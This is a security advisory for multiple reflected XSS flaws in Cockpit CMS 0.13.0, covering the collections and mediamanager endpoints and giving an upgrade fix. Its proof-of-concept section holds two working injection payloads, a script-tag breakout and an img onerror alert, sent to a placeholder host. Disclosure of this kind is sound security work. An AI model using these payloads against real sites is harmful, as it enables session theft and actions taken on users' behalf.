Cockpit CMS 0.13.0 - Multiple Reflected XSS

Overview #

Multiple Reflected Cross-site Scripting (XSS) vulnerabilities exist in Cockpit CMS version 0.13.0. The vulnerabilities allow remote attackers to inject arbitrary web script or HTML.

Vulnerability Details #

Affected Versions: 0.13.0 and earlier

Location: /collections/entries/ and /mediamanager/api endpoints

Affected Parameters: filter and path

Root Cause: Insufficient input validation and output encoding on multiple parameters allows XSS attacks.

Exploitation Requirements #

• No authentication required
• Victim must visit crafted URLs

Impact #

Remote attackers can exploit these vulnerabilities to:

• Steal admin session cookies
• Perform actions on behalf of users
• Access CMS data

Proof of Concept #

GET /cockpit-0.13.0/collections/entries/{HASH}&filter='"--></style></scRipt><scRipt>alert(0x0032AA)</scRipt> HTTP/1.1
Host: target.com

POST /cockpit-0.13.0/mediamanager/api HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

path=><iMg src=N onerror=alert(9)>

Solution #

Upgrade to a patched version of Cockpit CMS that includes proper input sanitization and output encoding.

References #

• Invicti Advisory NS-16-015

Timeline:

• [2016-09-19] - Advisory released

Credits: Omar Kurt